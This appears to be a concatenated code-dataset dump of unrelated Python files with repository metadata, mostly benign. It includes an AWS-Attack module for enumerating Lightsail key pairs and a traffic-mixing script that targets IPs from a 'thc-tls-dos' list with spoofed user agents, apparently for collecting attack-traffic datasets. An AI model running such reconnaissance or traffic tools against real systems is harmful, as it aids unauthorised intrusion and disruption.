guess = list_num[mid]
if guess == number:
return mid
if guess > number:
high_border = mid - 1
else:
low_border = mid + 1
return None
print(binary_search([1, 3, 5, 7, 9], 3))
| [
"[email protected]"
] | |
06b82317f341de041aa076425ac0ea6a0b157357 | fdb9b553a23647f7ea06f690613707c40b54902f | /src/main/resources/resource/LocalSpeech/LocalSpeech.py | 3c699a5680887399d9993fd401bcfa08d5ebce64 | [
"CC-BY-2.5",
"Apache-2.0"
] | permissive | ShaunHolt/myrobotlab | d8d9f94e90457474cf363d36f4a45d396cfae900 | 92046d77abd560f0203050b3cccb21aa9df467f2 | refs/heads/develop | 2021-07-08T04:55:01.462116 | 2020-04-18T19:58:17 | 2020-04-18T19:58:17 | 122,795,957 | 0 | 0 | Apache-2.0 | 2020-04-18T19:58:18 | 2018-02-25T01:37:54 | Java | UTF-8 | Python | false | false | 886 | py | #########################################
# LocalSpeech.py
# description: used as a general template
# categories: speech
# more info @: http://myrobotlab.org/service/LocalSpeech
#########################################
# start the service
mouth = Runtime.start('mouth','LocalSpeech')
#possible voices ( selected voice is stored inside config until you change it )
print ("these are the voices I can have", mouth.getVoices())
print ("this is the voice I am using", mouth.getVoice())
# ( macOs )
# set your voice from macos control panel
# you can test it using say command from terminal
# mouth.setVoice("Microsoft Zira Desktop - English (United States)")
mouth.speakBlocking(u"Hello this is an english voice")
mouth.speakBlocking(u"Bonjour ceci est une voix française, je teste les accents aussi avec le mot éléphant")
mouth.setVolume(0.7)
mouth.speakBlocking("Silent please") | [
"[email protected]"
] | |
474938eddcd278b842c02f4bc13beab9969ae5d4 | cbf448f9fa287b38a6b175040141e9ee445cfcd1 | /DNN_3L/evaluation_matrics.py | cbb95bef1984a401aac76d2f267d039a67d8c78a | [] | no_license | rnaimehaom/SST-Result | 271c115d6ab1f14265169d98f604d4a63c71184e | 829029b060010b2928032b3d6728c660b538b5cf | refs/heads/main | 2023-03-27T23:17:53.935109 | 2021-04-09T02:49:58 | 2021-04-09T02:49:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 15:39:34 2020
@author: tanzheng
"""
import pickle
import numpy as np
with open('DNN_3L_SST_predict.pkl', 'rb') as f:
MT_predict_result = pickle.load(f)
f.close()
first_pred_out_y, second_pred_out_y, out_prop_y, tasks = MT_predict_result
No_samples = out_prop_y.shape[0]
np_fir_pred_out_y = np.empty(shape=(No_samples, 0))
np_sec_pred_out_y = np.empty(shape=(No_samples, 0))
for i in range(len(first_pred_out_y)):
np_fir_pred_out_y = np.hstack((np_fir_pred_out_y, first_pred_out_y[i]))
np_sec_pred_out_y = np.hstack((np_sec_pred_out_y, second_pred_out_y[i]))
# target RRMSE
# single target
single_task_RRMSE = []
for i in range(len(tasks)):
temp_ST_RRMSE = sum(np.square(out_prop_y[:,i]-np_fir_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_ST_RRMSE = np.sqrt(temp_ST_RRMSE)
single_task_RRMSE.append(temp_ST_RRMSE)
# multi target
multi_task_RRMSE = []
for i in range(len(tasks)):
temp_MT_RRMSE = sum(np.square(out_prop_y[:,i]-np_sec_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_MT_RRMSE = np.sqrt(temp_MT_RRMSE)
multi_task_RRMSE.append(temp_MT_RRMSE)
| [
"[email protected]"
] | |
ef5cfcba95a6606c5510682302bc8b7563f002b6 | e90bf4b372da78ceec15282d060b48d18ba8d4e9 | /supervisor/backups/const.py | c4b5e593e438d1e447c34ebcb2e8cc63ca5d919e | [
"Apache-2.0"
] | permissive | home-assistant/supervisor | 67f2e1755ff5fbf7cf2084351e1c32c6995274e0 | 4838b280adafed0997f32e021274b531178386cd | refs/heads/main | 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 | Apache-2.0 | 2023-09-14T17:11:27 | 2017-03-14T08:54:15 | Python | UTF-8 | Python | false | false | 945 | py | """Backup consts."""
from enum import StrEnum
BUF_SIZE = 2**20 * 4 # 4MB
class BackupType(StrEnum):
"""Backup type enum."""
FULL = "full"
PARTIAL = "partial"
class BackupJobStage(StrEnum):
"""Backup job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
DOCKER_CONFIG = "docker_config"
FINISHING_FILE = "finishing_file"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
class RestoreJobStage(StrEnum):
"""Restore job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
AWAIT_HOME_ASSISTANT_RESTART = "await_home_assistant_restart"
CHECK_HOME_ASSISTANT = "check_home_assistant"
DOCKER_CONFIG = "docker_config"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
REMOVE_DELTA_ADDONS = "remove_delta_addons"
| [
"[email protected]"
] | |
c553d74eaa132d25fe4fc5ed0e0a10d05a9ff9e5 | f2a55f94783fed2a53bc2ff1a0096cfdb75dc5a3 | /3rd Year Diatomic Simulation Exercise/Particle1D.py | 9b7e688d4446b103fb241661e708022f216dd910 | [] | no_license | callous4567/UoE-Projects | c7b307878ae1d6b7e00227bb1a681aec2ad55b1f | 5a4ee803f70f7da9d860f905114a71278c7f50e7 | refs/heads/master | 2023-02-18T22:19:25.496429 | 2023-02-13T01:00:19 | 2023-02-13T01:00:19 | 245,646,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,034 | py | """
CMod Ex2: Particle1D, a class to describe 1D particles
"""
class Particle1D(object):
"""
Class to describe 1D particles.
Properties:
position(float) - position along the x axis
velocity(float) - velocity along the x axis
mass(float) - particle mass
Methods:
* formatted output
* kinetic energy
* first-order velocity update
* first- and second order position updates
"""
def __init__(self, pos, vel, mass):
"""
Initialise a Particle1D instance
:param pos: position as float
:param vel: velocity as float
:param mass: mass as float
"""
self.position = pos
self.velocity = vel
self.mass = mass
def __str__(self):
"""
Define output format.
For particle p=(2.0, 0.5, 1.0) this will print as
"x = 2.0, v = 0.5, m = 1.0"
"""
return "x = " + str(self.position) + ", v = " + str(self.velocity) + ", m = " + str(self.mass)
def kinetic_energy(self):
"""
Return kinetic energy as
1/2*mass*vel^2
"""
return 0.5*self.mass*self.velocity**2
# Time integration methods
def leap_velocity(self, dt, force):
"""
First-order velocity update,
v(t+dt) = v(t) + dt*F(t)
:param dt: timestep as float
:param force: force on particle as float
"""
self.velocity += dt*force/self.mass
def leap_pos1st(self, dt):
"""
First-order position update,
x(t+dt) = x(t) + dt*v(t)
:param dt: timestep as float
"""
self.position += dt*self.velocity
def leap_pos2nd(self, dt, force):
"""
Second-order position update,
x(t+dt) = x(t) + dt*v(t) + 1/2*dt^2*F(t)
:param dt: timestep as float
:param force: current force as float
"""
self.position += dt*self.velocity + 0.5*dt**2*force/self.mass
hey = Particle1D()
print(hey.position)
| [
"[email protected]"
] | |
d2797398c8da6c4fb49aafc3d736a1391d150f12 | b6f0b3932f8cdee542f3f1fe7f5c27c67e5d1c2d | /conf/train_conf_dense_7.py | 1c88e9db0a9644002cbed124c0e05c35b5d75b9d | [] | no_license | fuding/codes_for_sicheng | dcab85b66d9f3a0f0c78c5e471223d919a3d14f7 | c8ba21572921ba0aa9686174305ab48fa614cd5d | refs/heads/master | 2022-02-26T16:32:01.253870 | 2019-10-11T06:10:27 | 2019-10-11T06:10:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,453 | py | from easydict import EasyDict
def get_config():
conf = EasyDict()
conf.arch = "dense_7"
conf.model = "MultiHDR"
conf.model_name = conf.arch + ""
conf.use_cpu = False
conf.is_train = True
conf.gpu_ids = [0]
conf.epoch = 400
conf.start_epoch = 0
conf.learning_rate = 0.0002
conf.beta1 = 0.5
conf.loss = 'l2' # l1 or l2
conf.lr_scheme = "MultiStepLR"
conf.lr_steps = [100 * 2387]
conf.lr_gamma = 0.1
conf.dataset_dir = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/"
conf.exp_path = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/exp.json"
conf.dataset_name = 'Multi_LDR_HDR'
conf.batch_size = 8
conf.load_size = 256
conf.fine_size = 256
conf.c_dim = 3
conf.num_shots = 3
conf.n_workers = 4
conf.use_shuffle = True
conf.use_tb_logger = True
conf.experiments_dir = "../../experiments/" + conf.model_name
conf.log_dir = "../../tb_logger/" + conf.model_name
conf.save_freq = 2000
conf.print_freq = 200
# conf.resume_step = 78000
# conf.pretrained = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/models/' + str(
# conf.resume_step) + '_G.pth'
# conf.resume = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/training_state/' + str(
# conf.resume_step) + '.state'
conf.pretrained = None
conf.resume = None
return conf | [
"[email protected]"
] | |
c3025edb9e0a4bfafad31ec4def223cfdd8a6809 | 3cc2f47de6d78d610a2887f92bfba150b2994888 | /application/forms/account.py | b709a49955ab50546f45efab620eda042081cd50 | [] | no_license | fengliu222/blogbar | c8a66df586187d0a16063e4536e76d155863fe17 | ff6e7182f000777112101eed12ae9e2ca4298d25 | refs/heads/master | 2021-01-15T08:59:51.478354 | 2014-12-20T08:13:53 | 2014-12-20T08:13:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | # coding: utf-8
from flask_wtf import Form
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired, Email
from ..models import User
class SigninForm(Form):
"""Form for signin"""
email = StringField('邮箱',
validators=[
DataRequired(),
Email()
],
description='Email')
password = PasswordField('密码',
validators=[DataRequired()],
description='Password')
def validate_email(self, field):
user = User.query.filter(User.email == self.email.data).first()
if not user:
raise ValueError("Account doesn't exist.")
def validate_password(self, field):
if self.email.data:
user = User.query.filter(User.email == self.email.data,
User.password == self.password.data).first()
if not user:
raise ValueError('Password cannot match the Email.')
else:
self.user = user | [
"[email protected]"
] | |
8d3c1b8bce69b57d0d51802846a66c1e439b70e4 | ca4faa1c6d4d87d1702b2c42a64ea6a063d71de9 | /q2_micom/_transform.py | bc96be1fc23acd5496509e2495ad09d70dc7cd8b | [
"Apache-2.0"
] | permissive | Gibbons-Lab/q2-micom | cb0ed1185a50248eae94a415e03443dbacfa8bfb | 2d954d4f584675c29aa2eccb5245e4469f1740b6 | refs/heads/master | 2020-12-07T08:48:10.020690 | 2020-01-07T23:27:39 | 2020-01-07T23:27:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,558 | py | """Transformers for MICOM types."""
import pandas as pd
from q2_micom.plugin_setup import plugin
import q2_micom._formats_and_types as ft
@plugin.register_transformer
def _1(data: pd.DataFrame) -> ft.MicomMediumFile:
mm = ft.MicomMediumFile()
data.to_csv(str(mm), index=False)
return mm
@plugin.register_transformer
def _2(mm: ft.MicomMediumFile) -> pd.DataFrame:
return pd.read_csv(str(mm), index_col=False)
@plugin.register_transformer
def _3(data: pd.DataFrame) -> ft.ModelManifest:
sbm = ft.SBMLManifest()
data.to_csv(str(sbm), index=False)
return sbm
@plugin.register_transformer
def _4(sbm: ft.ModelManifest) -> pd.DataFrame:
return pd.read_csv(str(sbm), index_col=False)
@plugin.register_transformer
def _5(data: pd.DataFrame) -> ft.CommunityModelManifest:
cmm = ft.CommunityModelManifest()
data.to_csv(str(cmm), index=False)
return cmm
@plugin.register_transformer
def _6(cmm: ft.CommunityModelManifest) -> pd.DataFrame:
return pd.read_csv(str(cmm), index_col=False)
@plugin.register_transformer
def _7(data: pd.DataFrame) -> ft.GrowthRates:
gr = ft.GrowthRates()
data.to_csv(str(gr), index=False)
return gr
@plugin.register_transformer
def _8(gr: ft.GrowthRates) -> pd.DataFrame:
return pd.read_csv(str(gr), index_col=False)
@plugin.register_transformer
def _9(data: pd.DataFrame) -> ft.Fluxes:
ef = ft.Fluxes()
data.to_parquet(str(ef))
return ef
@plugin.register_transformer
def _10(ef: ft.Fluxes) -> pd.DataFrame:
return pd.read_parquet(str(ef))
| [
"[email protected]"
] | |
3f3fb632bea88ffa2e488c584544669d6e396c19 | f7328c45c872b69c3b7c2a2bf563257f51e5fbff | /src/sound.py | 02015b9b715fb2938284ce88bb0d22e84a8a2496 | [
"MIT"
] | permissive | whoji/banjiu_2048 | ffc45ff9e0b65cccea2b3cc6e91b233db9f7ae79 | d99522f2f0f6d159b5ecb49d023ee06da5f0f5a5 | refs/heads/master | 2020-04-21T04:01:06.870805 | 2019-02-10T09:09:31 | 2019-02-10T09:09:31 | 169,301,201 | 0 | 0 | null | 2019-02-07T03:58:40 | 2019-02-05T19:42:21 | Python | UTF-8 | Python | false | false | 2,088 | py | import pygame
from flags import F
class SoundPlayer(object):
"""docstring for SoundPlayer"""
def __init__(self, pygame):
self.pygame = pygame
self.__load_sound()
self.is_playing = False
def __load_sound(self):
self.sounds = {
'move' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_1.wav'),
'merge' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_2.wav'),
'castle' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_3.wav'),
'main_menu' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/sfx_sounds_powerup2.wav'),
'game_over' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
'game_finish' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
}
self.sounds['move'].set_volume(0.3)
self.sounds['main_menu'].set_volume(0.5)
self.sounds['game_over'].set_volume(0.3)
self.sounds['game_finish'].set_volume(0.3)
def play_sound_effect(self, event, game_status):
if game_status == 1: # main menu
if not self.is_playing:
self.sounds['main_menu'].play()
self.is_playing = True
return
elif game_status == 4:
if not self.is_playing:
self.sounds['game_over'].play()
self.is_playing = True
return
elif game_status == 6:
if not self.is_playing:
self.sounds['game_finish'].play()
self.is_playing = True
return
else:
if event[2]: # upgrade
self.sounds['castle'].play()
return
if event[3]: # cancelled_list is not empty
self.sounds['castle'].play()
return
#elif event[1]:
# self.sounds['merge'].play()
#elif event[0]:
# self.sounds['move'].play()
def play_action_sound(self):
self.sounds['move'].play()
| [
"[email protected]"
] | |
a76b4bd5db57d7d3f6e4f183973cdbe0b2485ff0 | 700c7801958dd4789caf94785b5dc8c5e3daa4fd | /ttp/lightsail_enum_keypairs.py | b60a67c5e6315a9d9da0f5817af2698ca230cd17 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | blackbotsecurity/AWS-Attack | 24d4cd6ebda067e9672f4f963d414a7b176e3551 | ad4668ab60173aabce3c6b9c7685160be5e3f14d | refs/heads/master | 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #!/usr/bin/env python3
import datetime
#'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
import argparse
from botocore.exceptions import ClientError
import importlib
target = ''
technique_info = {
'blackbot_id': 'T1526.b.001',
'external_id': '',
'controller': 'lightsail_enum_keypairs',
'services': ['Lightsail'],
'external_dependencies': [],
'arguments_to_autocomplete': [],
'version': '1',
'aws_namespaces': [],
'last_updated_by': 'Blackbot, Inc. Sun Sep 20 04:13:33 UTC 2020' ,
'ttp_exec': '',
'ttp_mitigation': '',
'ttp_detection': '',
'intent': 'Captures common data associated with Lightsail',
'name': 'Cloud Service Discovery: Lightsail' ,
}
parser = argparse.ArgumentParser(add_help=False, description=technique_info['name'])
def main(args, awsattack_main):
args = parser.parse_args(args)
import_path = 'ttp.src.lightsail_enum_keypairs_src'
src_code = __import__(import_path, globals(), locals(), ['technique_info'], 0)
importlib.reload(src_code)
awsattack_main.chain = True
return src_code.main(args, awsattack_main)
def summary(data, awsattack_main):
out = ' Regions Enumerated:\n'
for region in data['regions']:
out += ' {}\n'.format(region)
del data['regions']
for field in data:
out += ' {} {} enumerated\n'.format(data[field], field[:-1] + '(s)')
return out
| [
"[email protected]"
] | |
1a7bacfc9808852cf7b990a159af019328d3deb0 | 9c0f691393abbeb5754e1624e0c48dfcdf857352 | /2017/Helpers/day_06.py | b8fc0de773effcccfda5ee364b548908e7b0101b | [] | no_license | seligman/aoc | d0aac62eda3e6adc3c96229ca859bd2274398187 | 9de27ff2e13100770a3afa4595b15565d45bb6bc | refs/heads/master | 2023-04-02T16:45:19.032567 | 2023-03-22T15:05:33 | 2023-03-22T15:05:33 | 230,493,583 | 17 | 10 | null | null | null | null | UTF-8 | Python | false | false | 1,540 | py | #!/usr/bin/env python3
DAY_NUM = 6
DAY_DESC = 'Day 6: Memory Reallocation'
def calc(log, values, redo):
banks = [int(x) for x in values[0].replace("\t", " ").split(" ")]
seen = set()
while True:
key = tuple(banks)
if key in seen:
if redo == 0:
break
else:
seen = set()
redo -= 1
seen.add(key)
i = banks.index(max(banks))
val = banks[i]
banks[i] = 0
for x in range(val):
banks[(i + 1 + x) % len(banks)] += 1
return len(seen)
def test(log):
values = [
"0 2 7 0",
]
if calc(log, values, 0) == 5:
if calc(log, values, 1) == 4:
return True
else:
return False
else:
return False
def run(log, values):
log(calc(log, values, 0))
log(calc(log, values, 1))
if __name__ == "__main__":
import sys, os
def find_input_file():
for fn in sys.argv[1:] + ["input.txt", f"day_{DAY_NUM:0d}_input.txt", f"day_{DAY_NUM:02d}_input.txt"]:
for dn in [[], ["Puzzles"], ["..", "Puzzles"]]:
cur = os.path.join(*(dn + [fn]))
if os.path.isfile(cur): return cur
fn = find_input_file()
if fn is None: print("Unable to find input file!\nSpecify filename on command line"); exit(1)
print(f"Using '{fn}' as input file:")
with open(fn) as f: values = [x.strip("\r\n") for x in f.readlines()]
print(f"Running day {DAY_DESC}:")
run(print, values)
| [
"[email protected]"
] | |
7d694881d590f7fe45d3be9f6d9c0c180d407993 | 0049d7959ff872e2ddf6ea3ce83b6c26512425a6 | /django_demo_applications/djangoprojectsot/modelinheritanceproject/testapp/models.py | 2ba2ba663d87e53e60132476cad2e672ab93660a | [] | no_license | srazor09/Django_projects | 9806ab25d966af780cdabe652a1792220c7806a8 | 8d664ba4c9478bd93c8e5bcbcaf594e8ffe6ce93 | refs/heads/master | 2023-04-18T02:13:15.993393 | 2021-05-04T20:34:05 | 2021-05-04T20:34:05 | 364,379,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from django.db import models
# Create your models here.
# class ContactInfo1(models.Model):
# name=models.CharField(max_length=64)
# email=models.EmailField()
# address=models.CharField(max_length=264)
#
# class Student1(ContactInfo1):
# rollno=models.IntegerField()
# marks=models.IntegerField()
#
# class Teacher1(ContactInfo1):
# subject=models.CharField(max_length=264)
# salary=models.FloatField()
class BasicModel(models.Model):
f1=models.CharField(max_length=64)
f2=models.CharField(max_length=64)
f3=models.CharField(max_length=64)
class StandardModel(BasicModel):
f4=models.CharField(max_length=64)
f5=models.CharField(max_length=64)
| [
"[email protected]"
] | |
2a8d31ce9ce3683a0d4c071feaf1b1488a845422 | 48dab42eeef7f971af1fe98045e669edb8e57ab0 | /behavioural/observer_pattern.py | 864f36310cf2de51d7e96f2ba31734a1eb35c03e | [
"MIT"
] | permissive | cosmos-sajal/python_design_patterns | b7df3e83e74ac5eccd30e8037ebc70987407ca2b | d270989f1dfafaef48e4b585eca91603a6c0ac8e | refs/heads/master | 2022-06-06T16:41:41.638518 | 2020-05-05T08:20:16 | 2020-05-05T08:20:16 | 260,250,022 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,112 | py | # Docs - https://deductionlearning.com/design-patterns/observer-pattern-introductory-example/
# https://www.youtube.com/watch?v=wiQdrH2YpT4&list=PLF206E906175C7E07&index=4
# https://www.quora.com/What-are-some-real-world-uses-of-observer-pattern
# difference between PubSub and Observer Pattern -
# https://hackernoon.com/observer-vs-pub-sub-pattern-50d3b27f838c
from abc import ABCMeta, abstractmethod
class Subject(metaclass=ABCMeta):
@abstractmethod
def register(self):
pass
@abstractmethod
def unRegister(self):
pass
@abstractmethod
def notify(self):
pass
class Observer(metaclass=ABCMeta):
@abstractmethod
def update(googlePrice, applePrice, ibmPrice):
pass
class StockObserver(Observer):
observerCounter = 0
def __init__(self, stockGrabber):
StockObserver.observerCounter += 1
self.observerId = StockObserver.observerCounter
stockGrabber.register(self)
def update(self, googlePrice, applePrice, ibmPrice):
print("observer id -" + str(self.observerId))
print("the prices are:" + str(googlePrice) +
" " + str(applePrice) + " " + str(ibmPrice))
class StockGrabber(Subject):
def __init__(self):
self.googlePrice = 0.0
self.applePrice = 0.0
self.ibmPrice = 0.0
self.observers = []
def register(self, o):
self.observers.append(o)
def unRegister(self, o):
self.observers.remove(o)
def notify(self):
for observer in self.observers:
observer.update(self.googlePrice, self.applePrice, self.ibmPrice)
def setGooglePrice(self, price):
self.googlePrice = price
self.notify()
def setApplePrice(self, price):
self.applePrice = price
self.notify()
def setIBMPrice(self, price):
self.ibmPrice = price
self.notify()
stockGrabber = StockGrabber()
observer1 = StockObserver(stockGrabber)
observer2 = StockObserver(stockGrabber)
stockGrabber.setGooglePrice(100.0)
stockGrabber.setApplePrice(200.0)
stockGrabber.setIBMPrice(300.0)
| [
"[email protected]"
] | |
1e5122dc89c65f5bcead30da6a84115a1b6723ee | 94f978c65b6368f936e18364cc477591094750f5 | /quart/__init__.py | c7fa2b897ed9969c7681fd2a6aa8a28fd1fd4750 | [
"MIT"
] | permissive | tharvik/quart | 2a4ff330dd384dc9f917b179e8d247808e7ccd6c | 038680bcc1c0966481d73bdbe474f55a3ce104f4 | refs/heads/master | 2021-04-18T21:54:18.339532 | 2018-03-06T08:06:33 | 2018-03-06T08:11:48 | 126,790,492 | 0 | 0 | null | 2018-03-26T07:29:58 | 2018-03-26T07:29:58 | null | UTF-8 | Python | false | false | 2,082 | py | from jinja2 import escape, Markup
from .__about__ import __version__
from .app import Quart
from .blueprints import Blueprint
from .config import Config
from .ctx import (
after_this_request, copy_current_request_context, copy_current_websocket_context,
has_app_context, has_request_context, has_websocket_context,
)
from .exceptions import abort
from .globals import (
_app_ctx_stack, _request_ctx_stack, _websocket_ctx_stack, current_app, g, request, session,
websocket,
)
from .helpers import (
flash, get_flashed_messages, get_template_attribute, make_response, stream_with_context,
url_for,
)
from .json import jsonify
from .signals import (
appcontext_popped, appcontext_pushed, appcontext_tearing_down, before_render_template,
got_request_exception, message_flashed, request_finished, request_started,
request_tearing_down, signals_available, template_rendered,
)
from .static import safe_join, send_file, send_from_directory
from .templating import render_template, render_template_string
from .typing import ResponseReturnValue
from .utils import redirect
from .wrappers import Request, Response
__all__ = (
'__version__', '_app_ctx_stack', '_request_ctx_stack', '_websocket_ctx_stack', 'abort',
'after_this_request', 'appcontext_popped', 'appcontext_pushed', 'appcontext_tearing_down',
'before_render_template', 'Blueprint', 'Config', 'copy_current_request_context',
'copy_current_websocket_context', 'current_app', 'escape', 'flash', 'g',
'get_flashed_messages', 'get_template_attribute', 'got_request_exception', 'has_app_context',
'has_request_context', 'has_websocket_context', 'htmlsafe_dumps', 'jsonify', 'make_response',
'Markup', 'message_flashed', 'Quart', 'redirect', 'render_template', 'render_template_string',
'request', 'Request', 'request_finished', 'request_started', 'request_tearing_down',
'Response', 'ResponseReturnValue', 'safe_join', 'send_file', 'send_from_directory', 'session',
'signals_available', 'stream_with_context', 'template_rendered', 'url_for', 'websocket',
)
| [
"[email protected]"
] | |
8463f1d6308fa2292d9dfa2ea550c1529e9d3cd5 | 1c3c155f39573ca9b382bc2520dde359cc6f8fe6 | /mix_traffic.py | 0480d3f061e9e726c1ed9516f74c19b851135496 | [] | no_license | zxyap/mix_traffic_collection | 885a60a3f30783d05124e26eb7ddc97fc6ecbf5d | 14f34dec56226ca2ed1ac6c29cb5f155cb9420e1 | refs/heads/master | 2022-12-11T10:02:19.215427 | 2019-10-03T13:35:04 | 2019-10-03T13:35:04 | 211,783,201 | 0 | 0 | null | 2022-12-08T06:39:30 | 2019-09-30T05:38:15 | Python | UTF-8 | Python | false | false | 14,711 | py | import os
from selenium import webdriver
import subprocess
import datetime
import logging
import socket
import random
from fake_useragent import UserAgent
import time
from urllib.request import Request, urlopen
import urllib.error
import argparse
from bs4 import BeautifulSoup
import sys
from selenium.common.exceptions import InvalidArgumentException
import pandas as pd
import numpy as np
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import InvalidSessionIdException
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import SessionNotCreatedException
from selenium.common.exceptions import WebDriverException
import http.client
import ssl
import psutil
import requests
from requests import HTTPError
from requests import Timeout
from requests import RequestException
import threading
#global variable
isAttacking = 1;
isNormal = 0;
excel_dir = "./report_unique_normal.xlsx"
excel_dir_dos = "./report_unique_dos.xlsx"
print("Reading from excel file now for the list of sites to test...")
df = pd.read_excel(excel_dir, sheet_name="complete_list")
df_dos = pd.read_excel(excel_dir_dos, sheet_name="thc-tls-dos")
dictionary = {}
dictionary_dos = {}
ip_list_normal = df['IP']
ip_list_dos = df_dos['IP']
ua = UserAgent()
length = 0
def clean_domain(url):
if "https://" in url:
result = url[8:]
elif "http://" in url:
result = url[7:]
else:
result = url
if "/" in result:
result = result.split("/")[0]
return result
def normal(ip):
# Finding the chromedriver path to start selenium web driver
# Getting the abs path of chromedriver for selenium automation
cdPath = "chromedriver"
chromeDriverPath = os.path.abspath(cdPath)
while isAttacking == 1:
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument('--ignore-certificate-errors-spki-list')
options.add_argument('--ignore-ssl-errors')
options.add_argument('--no-sandbox')
options.add_argument('--headless')
options.add_argument('--disable-dev-shm-usage')
try:
driver = webdriver.Chrome(chromeDriverPath, options=options)
except SessionNotCreatedException as snce:
logging.exception(str(snce) + " session failed to create")
pass
# Setting a timeout for the page load to hasten the process
driver.set_page_load_timeout(time_to_wait=30)
# Getting domain
domain = dictionary[ip]
print("testing " + domain)
# Check if website has http
if domain[0:7] != "http://":
# appending https:// for urllib
domain_urllib = "https://" + domain
else:
domain_urllib = domain
print(domain_urllib)
headers = {'User-Agent': ua.random}
req = Request(
domain_urllib,
headers={'User-Agent': ua.random}
)
# Trying to open the URL to scrape HTML
try:
resp = urlopen(req).read()
except urllib.error.HTTPError as httpe:
logging.error(str(httpe) + " for " + domain_urllib)
continue
except urllib.error.URLError as urle:
logging.error(str(urle) + " for " + domain_urllib)
continue
except TimeoutError as toe:
logging.error(str(toe) + " for " + domain_urllib)
continue
except http.client.HTTPException as httpexcep:
logging.error(str(httpexcep) + " for " + domain_urllib)
continue
except ssl.CertificateError as sslCE:
logging.error(str(sslCE) + " for " + domain_urllib)
continue
except ConnectionResetError as cre:
logging.error(str(cre) + " for " + domain_urllib)
continue
except UnicodeEncodeError as uee:
logging.error(str(uee) + " for " + domain_urllib)
continue
except ValueError as ve:
logging.error(str(ve) + " for " + domain_urllib)
continue
soup = BeautifulSoup(resp, "html.parser")
cleanLinks = []
for link in soup.find_all('a', href=True):
if "javascript" not in link or "#" not in link:
cleanLinks.append(link["href"])
try:
driver.get(domain_urllib)
except TimeoutException as toe:
print("Timeout, moving onto next site")
logging.exception(str(toe) + " for " + domain_urllib)
pass
except InvalidSessionIdException as isie:
print("Invalid session id, moving on to the next site")
logging.exception(str(isie) + " for " + domain_urllib)
pass
# This polls for the return code of the tshark process, once 200 packets have been captured, expected return : 0
count = 0
timeout = 50
#set flag = 1 once the normal traffic has started
global isNormal
isNormal = 1
while 1 and isAttacking == 1 :
count = 1 #make counter a non factor
return_code = sts.poll()
if return_code == 0 or count >= timeout:
if return_code == 0:
print("tshark has terminated gracefully")
logging.info("tshark has terminated gracefully")
elif count >= timeout:
print("timeout has been reached")
logging.info("timeout has been reached")
for proc in psutil.process_iter():
# check whether the process name matches
if proc.pid == sts.pid:
try:
proc.kill()
except psutil.NoSuchProcess as nsp:
logging.error(str(nsp))
finally:
break
else:
continue
break
else:
if len(cleanLinks) > 1:
link = random.choice(cleanLinks)
ip_socket = []
if "http" not in link and ".com" not in link:
seleniumLink = "https://" + domain + link
socketLink = domain
else:
seleniumLink = link
socketLink = clean_domain(link)
try:
socket_info = socket.getaddrinfo(socketLink, None)
except socket.gaierror as e:
logging.error(str(e) + " error for " + str(socketLink))
continue
except UnicodeError as e:
logging.error(str(e) + " error for " + str(socketLink))
continue
for info in socket_info:
ip_socket.append(info[4][0])
for ip_test in ip_socket:
# Introducing sleep between 3 to 8 seconds to allow simulation of user behaviour
#time.sleep(np.random.randint(low=3, high=8))
if ip_test == ip:
try:
driver.get(seleniumLink)
logging.info("Successfully accessed website " + str(seleniumLink))
except InvalidArgumentException as iae:
logging.info(str(iae) + "Invalid Argument Exception " + str(seleniumLink))
continue
except TimeoutException as te:
logging.info(str(te) + "Time Out Exception " + str(seleniumLink))
continue
except UnexpectedAlertPresentException as uape:
logging.exception(str(uape) + " unexpected alert present!")
driver.switch_to.alert.accept()
continue
except WebDriverException as wde:
logging.exception(str(wde) + " webdriver exception!")
continue
finally:
break
else:
print("Sending GET requests!")
logging.info("Sending GET requests to " + ip + " " + domain)
try:
requests.get("http://" + ip, headers={'User-Agent': ua.random}, timeout=5)
except ConnectionError as ce:
logging.error(str(ce))
except HTTPError as httperr:
logging.error(str(httperr))
except Timeout as toe:
logging.error(str(toe))
except RequestException as re:
logging.exception(str(re))
finally:
break
else:
pass
count = 0
# Kill chrome processes to clear memory to avoid virtual memory problem
